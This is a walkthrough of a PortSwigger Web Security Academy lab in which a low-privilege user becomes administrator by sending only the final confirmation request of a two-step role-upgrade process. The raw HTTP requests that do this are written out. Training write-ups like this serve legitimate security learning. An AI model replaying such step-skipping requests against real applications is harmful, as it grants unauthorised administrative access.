| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Multi-Step Process, Missing Check on Final Step) |
| Difficulty | Practitioner |
| Objective | Log in as wiener:peter and exploit the flawed access controls to promote yourself to administrator |
Multi-Step Process with No Access Control on One Step¶
Log in as administrator:admin.
Same upgrade/downgrade user list as the previous lab. Upgrading a user and intercepting:
POST /admin-roles HTTP/2
Host: 0a9800d903d9f2bd84ee0e49002c00f9.web-security-academy.net
Cookie: session=sxkCL7Qtec90IKAg74JnnFTD8kidhO53
username=carlos&action=upgrade
This time it doesn't immediately apply — it returns a 200 with an "are you sure?" confirmation form, a second step. Clicking "yes" and intercepting that:
POST /admin-roles HTTP/2
Host: 0a9800d903d9f2bd84ee0e49002c00f9.web-security-academy.net
action=upgrade&confirmed=true&username=carlos
So the flow is two steps: step 1 (action=upgrade&username=...) returns the confirmation form, step 2 (action=upgrade&confirmed=true&username=...) actually applies it. Logging in as wiener:peter.
Sending a direct POST /admin-roles request going straight for step 2 — skipping step 1 entirely:
POST /admin-roles HTTP/2
Host: 0a9800d903d9f2bd84ee0e49002c00f9.web-security-academy.net
action=upgrade&confirmed=true&username=wiener
This returns 302. Following the redirect:
wiener now has admin privileges.
lab solved